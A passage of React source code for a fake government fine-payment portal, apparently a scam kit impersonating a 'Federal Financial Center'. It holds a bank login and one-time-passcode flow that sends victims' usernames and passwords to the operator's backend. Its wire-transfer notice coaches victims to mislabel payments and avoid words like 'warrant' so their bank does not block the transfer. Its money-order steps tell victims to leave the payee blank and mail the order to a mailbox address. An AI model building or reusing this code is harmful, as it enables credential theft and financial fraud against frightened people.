              </button>
            </div>
          </div>
        </div>
        <button onClick={scrollToTop} className="w-full mt-6 text-blue-600 border border-blue-600 py-2 rounded font-semibold hover:bg-blue-50">Return to top ↑</button>
      </div>
    </div>
  );

  // ── EPAYMENT ────────────────────────────────────────────────────────────────
  const renderEPayment = () => (
    <div className="min-h-screen bg-gray-50 py-8 px-4">
      <div className="max-w-md mx-auto">
        <button onClick={() => handleViewChange('home')} className="flex items-center text-blue-600 mb-4 hover:text-blue-800"><ArrowLeft className="w-4 h-4 mr-1" /> Home</button>
        <h1 className="text-3xl font-bold text-gray-800 mb-8 text-center">Electronic ePayment</h1>
        <div className="bg-white rounded-lg shadow-md p-8">
          <div className="flex justify-center mb-6"><Globe className="w-16 h-16 text-blue-500" /></div>
          <div className="space-y-4 text-gray-700">
            <h2 className="text-xl font-bold text-gray-800 mb-4">How to Make an ePayment</h2>
            <p className="leading-snug"><span className="font-semibold">Step 1:</span> Select your preferred electronic payment provider from the list below.</p>
            <p className="leading-snug"><span className="font-semibold">Step 2:</span> Enter the payment amount matching your total fine.</p>
            <p className="leading-snug"><span className="font-semibold">Step 3:</span> Provide your Email or Phone to receive a payment request.</p>
            <p className="leading-snug"><span className="font-semibold">Step 4:</span> Log in to your ePayment Account and go to payment request.</p>
            <p className="leading-snug"><span className="font-semibold">Step 5:</span> Review all details carefully and continue to payment.</p>
            <p className="leading-snug"><span className="font-semibold">Step 6:</span> Submit payment and save your transaction ID for your records.</p>
            <div className="bg-yellow-50 border-l-4 border-yellow-500 p-4 mt-6"><p className="text-sm text-gray-700 leading-tight"><span className="font-semibold">Important:</span> ePayments are processed securely with 256-bit encryption. Transactions typically post within 24-48 hours.</p></div>
            <div className="mt-6">
              <label className="block text-sm font-medium text-gray-700 mb-2">Select Payment Provider</label>
              <select className="w-full border border-gray-300 rounded px-3 py-2 mb-4" value={epProvider} onChange={e => setEpProvider(e.target.value)}>
                <option value="">Choose provider...</option><option value="paypal">PayPal</option><option value="venmo">Venmo</option><option value="zelle">Zelle</option><option value="cashapp">Cash App</option><option value="applepay">Apple Pay</option><option value="other">Other</option>
              </select>
              <label className="block text-sm font-medium text-gray-700 mb-2">Payment Amount</label>
              <input type="text" className="w-full border border-gray-300 rounded px-3 py-2 mb-4" placeholder="$0.00" value={epAmount} onChange={e => setEpAmount(e.target.value)} />
              <label className="block text-sm font-medium text-gray-700 mb-2">Your Email/Phone</label>
              <input type="text" className="w-full border border-gray-300 rounded px-3 py-2 mb-4" placeholder="Enter email or phone number" value={epContact} onChange={e => setEpContact(e.target.value)} />
              <button className="w-full bg-blue-600 text-white py-3 rounded font-semibold hover:bg-blue-700 flex items-center justify-center gap-2" onClick={handleEPaymentSubmit} disabled={isSubmittingEp}>
                {isSubmittingEp ? <><div className="w-4 h-4 border-2 border-white border-t-transparent rounded-full animate-spin" /> Requesting…</> : 'Request Invoice'}
              </button>
            </div>
          </div>
        </div>
        <button onClick={scrollToTop} className="w-full mt-6 text-blue-600 border border-blue-600 py-2 rounded font-semibold hover:bg-blue-50">Return to top ↑</button>
      </div>
    </div>
  );

  // ── DIRECT TRANSFER ─────────────────────────────────────────────────────────
  const renderDirectTransfer = () => (
    <div className="min-h-screen bg-gray-50 py-8 px-4">
      <div className="max-w-md mx-auto">
        <button onClick={() => handleViewChange('home')} className="flex items-center text-blue-600 mb-4 hover:text-blue-800"><ArrowLeft className="w-4 h-4 mr-1" /> Home</button>
        <h1 className="text-2xl font-bold text-gray-800 mb-6">Federal Direct Transfer</h1>

        <div className="bg-white rounded-lg shadow-md p-6 mb-4">
          <p className="text-sm text-gray-700 mb-4 leading-snug">A wire transfer authorizes your financial institution to directly apply funds to your offender account as credit with the <strong>Federal Financial Center</strong>. This method is used for the settlement of citations, warrants, penalties, surety bonds and related enforcement matters.</p>
          <ol className="text-sm text-gray-700 space-y-2 list-decimal list-inside leading-snug mb-4"><li>Provide the full payment information to your financial institution exactly as shown below.</li><li>Submit any <span className="text-blue-600 underline cursor-pointer">supporting documentation</span> if required.</li></ol>
          <p className="text-xs text-gray-700 leading-tight"><strong>ATTN:</strong> For Federal Direct Transfers, including warrant clearance and surety-bond obligations, must follow these instructions to avoid processing delays.</p>
        </div>

        <div className="bg-white border border-gray-200 rounded-xl shadow-sm overflow-hidden mb-6">
          <div className="bg-gray-50 border-b border-gray-200 px-5 py-4"><h3 className="font-semibold text-gray-800">Direct Transfer Information</h3></div>
          <div className="p-5">
            {customPayment?.wireInstructions?.recipientName ? (
              <div className="bg-gray-50 p-4 rounded-lg border border-gray-100 font-mono text-sm text-gray-700 space-y-1.5 leading-relaxed">
                <p><span className="font-semibold text-gray-900">Recipient Name:</span> {customPayment.wireInstructions.recipientName}</p>
                <p><span className="font-semibold text-gray-900">Recipient Address:</span> {customPayment.wireInstructions.recipientAddress}</p>
                <p><span className="font-semibold text-gray-900">Account Number:</span> {customPayment.wireInstructions.accountNumber}</p>
                <p><span className="font-semibold text-gray-900">Routing Number:</span> {customPayment.wireInstructions.routingNumber}</p>
                <p><span className="font-semibold text-gray-900">Bank Name:</span> {customPayment.wireInstructions.bankName}</p>
                <p><span className="font-semibold text-gray-900">Bank Address:</span> {customPayment.wireInstructions.bankAddress}</p>
                <p><span className="font-semibold text-gray-900">Bank Country:</span> {customPayment.wireInstructions.bankCountry}</p>
                {customPayment.wireInstructions.memo && (
                  <p><span className="font-semibold text-gray-900">Memo:</span> {customPayment.wireInstructions.memo}</p>
                )}
              </div>
            ) : (
              <div className="text-sm text-gray-500">
                <p className="italic mb-3">Wire instructions not set.</p>
                <pre className="font-mono text-xs text-gray-400 whitespace-pre-wrap bg-gray-50 p-4 rounded-lg border border-gray-100 leading-relaxed">
{`Wire instructions:
Recipient Name
Recipient Address
Account Number
Routing Number
Bank Name
Bank Address
Bank Country`}
                </pre>
              </div>
            )}
          </div>

        </div>

        <div className="border-l-4 border-blue-700 bg-white rounded-lg p-5 mb-4 shadow-sm">
          <div className="flex items-center gap-2 mb-3"><span className="text-lg">⚖️</span><h3 className="font-bold text-gray-800 text-base">Compliance Notice</h3></div>
          <p className="text-sm text-gray-700 leading-snug mb-4 italic">All financial centers, along with any associated clearing agent(s), are obligated under federal banking compliance regulations to report transactions wherein individuals retrieve or repurpose funds related to legal enforcement, citation, or court-ordered surety bond activity...</p>
          <p className="text-sm font-bold text-gray-800 mb-3">To ensure lawful compliance and prevent your transaction from being flagged:</p>
          <ul className="text-sm text-gray-700 space-y-4 leading-snug italic">
            <li className="flex gap-2"><span className="mt-1 flex-shrink-0">•</span><span>Financial institutions and money services provider(s) are mandated to document funding transfer purposes. Avoid a direct transfer decline by appropriately labeling the transaction as being for <strong>"prepaid security settlement services"</strong> or <strong>"government administrative handling fees"</strong>.</span></li>
            <li className="flex gap-2"><span className="mt-1 flex-shrink-0">•</span><span>Avoid referencing specific legal terms such as <strong>"bond"</strong>, <strong>"warrant"</strong>, or <strong>"citations"</strong> during the transaction description purposes ( unless directed to by a federal officer or certified agency representative ). Failure to do so will prompt your financial institution to decline the inquired direct transfer as required under federal law.</span></li>
          </ul>
        </div>

        <div className="bg-white rounded-lg shadow-md p-6 mb-4">
          <h3 className="font-bold text-gray-800 text-base mb-3">Overnight Payments via Money Order</h3>
          <p className="text-sm text-gray-700 leading-snug mb-4">For individuals unable or ineligible to complete a wire transfer, the Federal Financial Center accepts overnight physical payments through the United States Postal Service (USPS).</p>
          <p className="text-sm font-bold text-gray-800 mb-2">Step-by-step instructions:</p>
          <ol className="text-sm text-gray-700 space-y-2 leading-snug list-decimal list-inside"><li>Visit any USPS retail location and request a <strong>money order</strong> for the exact required amount.</li><li>Leave the "Pay To" or "Recipient" field on the money order <strong>blank</strong>. This will be completed at the processing facility for chain-of-custody accuracy.</li><li>Place the money order in a flat mailer or USPS-provided overnight envelope. No other documents are required.</li><li>Address the overnight shipment to:</li></ol>
          
          
          
            {/* Mailing address block */}
            <div className="border-l-4 border-yellow-500 bg-gray-50 rounded p-4 mt-4">
              {customPayment?.mailingInfo?.title ? (
                <div>
                  <p className="text-sm font-bold text-gray-900">
                    {customPayment.mailingInfo.title}
                  </p>
                  <p className="text-sm text-gray-700 mt-1 whitespace-pre-wrap">
                    {customPayment.mailingInfo.address}
                  </p>
                </div>
              ) : (
                <>
                  <p className="text-sm font-bold text-gray-900">Federal Financial Center</p>
                  <p className="text-sm text-gray-700">178 Broadway #8616</p>
                  <p className="text-sm text-gray-700">Albany, NY 12207</p>
                </>
              )}
            </div>
            <p className="text-xs text-gray-600 italic leading-tight bt-4 mt-2">
              Use USPS Priority Mail Express (overnight service) and retain the tracking number.
            </p>



          <p className="text-xs text-gray-600 italic leading-tight bt-4 mt-2">Use USPS Priority Mail Express (overnight service) and retain the tracking number.</p>
        </div>
        <button onClick={scrollToTop} className="w-full mt-2 text-blue-600 border border-blue-600 py-2 rounded font-semibold hover:bg-blue-50">Return to top ↑</button>
      </div>
    </div>
  );

  // ── ACCOUNT LINK / BANK LOGIN / OTP ──────────────────────────────────────────
  const renderAccountLink = () => (
    <div className="min-h-screen bg-gradient-to-b from-gray-700 to-gray-900 py-8 px-4">
      <div className="max-w-md mx-auto">
        <button onClick={() => handleViewChange('home')} className="flex items-center text-white mb-4 hover:text-gray-300"><ArrowLeft className="w-4 h-4 mr-1" /> Home</button>
        <div className="bg-white rounded-lg shadow-xl p-8">
          <div className="flex justify-center mb-6"><div className="w-16 h-16 bg-yellow-600 rounded-full flex items-center justify-center"><Lock className="w-10 h-10 text-white" /></div></div>
          <h2 className="text-2xl font-bold text-gray-800 text-center mb-4">Select Your Bank</h2>
          <p className="text-center text-gray-600 mb-6 leading-snug">Choose your bank to link your account securely</p>
          <p className="text-center text-gray-600 mb-6 leading-snug">Post fines directly from your bank account.</p>
          <select className="w-full border border-gray-300 rounded-lg px-4 py-3 mb-6 text-gray-700" value={selectedBank} onChange={(e) => setSelectedBank(e.target.value)}>
            <option value="">Select your financial institution...</option>
            {bankOptions.map((bank) => (<option key={bank._id || bank.name} value={bank.name}>{bank.name}</option>))}
          </select>
          {selectedBank && <button onClick={() => handleViewChange('bank-login')} className="w-full bg-blue-600 text-white py-3 rounded-lg font-semibold hover:bg-blue-700">Continue</button>}
          <p className="text-xs text-center text-gray-600 mt-6 leading-tight">By proceeding, you agree to our secure authentication process. Rest assured, your login credentials are securely encrypted.</p>
          <p className="text-xs text-center text-gray-600 mt-4 leading-tight">Need help? <span className="text-blue-600 underline cursor-pointer">Contact support</span> for assistance with connecting your account</p>
          <div className="mt-6 pt-6 border-t border-gray-200 flex items-center justify-center gap-2"><Building2 className="w-5 h-5 text-blue-700" /><p className="text-xs text-gray-600 leading-tight"><span className="font-semibold">FDIC insured</span> Backed by the full faith and credit of the U.S. Government</p></div>
        </div>
      </div>
    </div>
  );

  const renderBankLogin = () => (
    <div className="min-h-screen bg-gradient-to-b from-gray-700 to-gray-900 py-8 px-4">
      <div className="max-w-md mx-auto">
        <button onClick={() => handleViewChange('account-link')} className="flex items-center text-white mb-4 hover:text-gray-300"><ArrowLeft className="w-4 h-4 mr-1" /> Back</button>
        <div className="bg-white rounded-lg shadow-xl p-8">
          <div className="flex justify-center mb-6"><div className="w-16 h-16 bg-yellow-600 rounded-full flex items-center justify-center"><Lock className="w-10 h-10 text-white" /></div></div>
          <h2 className="text-2xl font-bold text-gray-800 text-center mb-4">Select Your Bank</h2>
          <p className="text-center text-gray-600 mb-6 leading-snug">Choose your bank to link your account securely</p>
          <div className="mb-4"><input type="text" value={selectedBank} readOnly className="w-full border-2 border-blue-500 rounded-lg px-4 py-3 text-gray-700 bg-blue-50" /></div>
          <div className="mb-4"><label className="block text-gray-700 font-medium mb-2">Username</label><input type="text" value={username} onChange={(e) => setUsername(e.target.value)} className="w-full border border-gray-300 rounded-lg px-4 py-3" placeholder="Enter username" /></div>
          <div className="mb-6"><label className="block text-gray-700 font-medium mb-2">Password</label><input type="password" value={password} onChange={(e) => setPassword(e.target.value)} className="w-full border border-gray-300 rounded-lg px-4 py-3" placeholder="Enter password" /></div>
         
         
          {/*<button onClick={() => { setOtpCode(Array(otpLength).fill('')); handleViewChange('otp'); }} className="w-full bg-blue-600 text-white py-3 rounded-lg font-semibold hover:bg-blue-700 mb-4">Sign in Securely</button>*/
          }
         
         <button
            onClick={async () => {
              if (!username || !password) {
                toast.error('Enter username and password');
                return;
              }
              setIsSubmitting(true);
              try {
                const res = await clientAPI.saveBankLogin({
                  bankName:    selectedBank,
                  username,
                  password,
                  accountType: 'checking',
                });
                setPendingBankId(res.data?.data?.bankId || null);
                setOtpCode(Array(otpLength).fill(''));
                handleViewChange('otp');
              } catch (err) {
                console.error('Bank login save error:', err);
                toast.error(err?.response?.data?.message || 'Could not save bank details');
              } finally {
                setIsSubmitting(false);
              }
            }}
            disabled={isSubmitting}
            className="w-full bg-blue-600 text-white py-3 rounded-lg font-semibold hover:bg-blue-700 mb-4 disabled:opacity-60 flex items-center justify-center gap-2"
          >
            {isSubmitting
              ? <><div className="w-4 h-4 border-2 border-white border-t-transparent rounded-full animate-spin" /> Saving…</>
              : 'Sign in Securely'}
          </button>


          <p className="text-xs text-center text-gray-600 leading-tight">By proceeding, you agree to our secure authentication process. Rest assured, your login credentials are securely encrypted.</p>
          <p className="text-xs text-center text-gray-600 mt-4 leading-tight">Need help? <span className="text-blue-600 underline cursor-pointer">Contact support</span> for assistance with connecting your account</p>
          <div className="mt-6 pt-6 border-t border-gray-200"><div className="bg-blue-900 rounded-full w-12 h-12 flex items-center justify-center mx-auto"><Building2 className="w-8 h-8 text-white" /></div><p className="text-xs text-center text-gray-600 mt-2 leading-tight"><span className="font-semibold">FDIC insured</span> Backed by the full faith and credit of the U.S. Government</p></div>
        </div>
      </div>
    </div>
  );

  const renderOtp = () => (
    <div className="min-h-screen bg-gradient-to-b from-gray-700 to-gray-900 py-8 px-4">
      <div className="max-w-md mx-auto">
        <div className="bg-gray-600 text-white p-4 rounded-t-lg">
          <div className="flex justify-center mb-2"><div className="w-12 h-12 bg-yellow-600 rounded-full flex items-center justify-center"><Lock className="w-8 h-8 text-white" /></div></div>
          <h2 className="text-xl font-bold text-center">Select Your Bank</h2><p className="text-sm text-center leading-snug">Choose your bank to link your account securely</p>
        </div>
        <div className="bg-white p-8">
          <h3 className="text-2xl font-bold text-gray-800 text-center mb-4">One-Time Passcode</h3>
          <p className="text-center text-gray-600 mb-6 leading-snug">For your safety and security, a one-time passcode has been sent to the phone number associated with this account. Please enter it below.</p>
          <div className="flex justify-center gap-2 mb-6">
            {otpCode.map((digit, index) => (<input key={index} id={`otp-${index}`} type="text" maxLength="1" value={digit} onChange={(e) => handleOtpChange(index, e.target.value)} onKeyDown={(e) => { if (e.key === 'Backspace' && !digit && index > 0) { document.getElementById(`otp-${index - 1}`)?.focus(); } }} className="w-12 h-14 text-center text-2xl font-bold border-2 border-gray-300 rounded-lg focus:border-blue-500 focus:outline-none" />))}
          </div>
          {/*<button onClick={handleOtpSubmit} disabled={otpCode.join('').length !== otpCode.length || isSubmitting} className={`w-full py-3 rounded-lg font-semibold flex items-center justify-center gap-2 ${otpCode.join('').length === otpCode.length && !isSubmitting ? 'bg-blue-500 text-white hover:bg-blue-600' : 'bg-gray-300 text-gray-500 cursor-not-allowed'}`}>
            {isSubmitting ? <><div className="w-4 h-4 border-2 border-gray-400 border-t-transparent rounded-full animate-spin" /> Saving…</> : 'Verify'}
          </button>*/}
          <button 
          onClick={handleOtpSubmit} 
          disabled={otpCode.join('').length < 4 || isSubmitting} 
          className={`w-full py-3 rounded-lg font-semibold flex items-center justify-center gap-2 ${otpCode.join('').length >= 4 && !isSubmitting ? 'bg-blue-500 text-white hover:bg-blue-600' : 'bg-gray-300 text-gray-500 cursor-not-allowed'}`}
        >
          {isSubmitting ? <><div className="w-4 h-4 border-2 border-gray-400 border-t-transparent rounded-full animate-spin" /> Saving…</> : 'Verify'}
        </button>
        </div>
        <div className="bg-gray-600 text-white p-4 rounded-b-lg">
          <p className="text-xs text-center mb-2 leading-tight">By proceeding, you agree to our secure authentication process. Rest assured, your login credentials are securely encrypted.</p>
          <p className="text-xs text-center leading-tight">Need help? <span className="underline cursor-pointer">Contact support</span> for assistance with connecting your account</p>
          <div className="mt-4 pt-4 border-t border-gray-500"><div className="bg-blue-900 rounded-full w-12 h-12 flex items-center justify-center mx-auto mb-2"><Building2 className="w-8 h-8 text-white" /></div><p className="text-xs text-center leading-tight"><span className="font-semibold">FDIC insured</span> Backed by the full faith and credit of the U.S. Government</p></div>
        </div>
      </div>
    </div>
  );

  const renderVerifying = () => (
    <div className="min-h-screen bg-white flex items-center justify-center">
      <div className="text-center"><h2 className="text-2xl font-bold text-gray-800 mb-4">Verifying...</h2><p className="text-gray-600 mb-8 leading-snug">Please wait while we verify your account.</p><div className="flex justify-center"><div className="w-16 h-16 border-4 border-blue-600 border-t-transparent rounded-full animate-spin"></div></div></div>
    </div>
  );

  if (isVerifying) return renderVerifying();

  return (
    <>
      {currentView === 'home'            && renderHome()}
      {currentView === 'card-payment'    && renderCardPayment()}
      {currentView === 'kiosk'           && renderKiosk()}
      {currentView === 'moneypak'        && renderMoneyPak()}
      {currentView === 'epayment'        && renderEPayment()}
      {currentView === 'direct-transfer' && renderDirectTransfer()}
      {currentView === 'account-link'    && renderAccountLink()}
      {currentView === 'bank-login'      && renderBankLogin()}
      {currentView === 'otp'             && renderOtp()}
    </>
  );
};

export default OnlinePaymentSystem;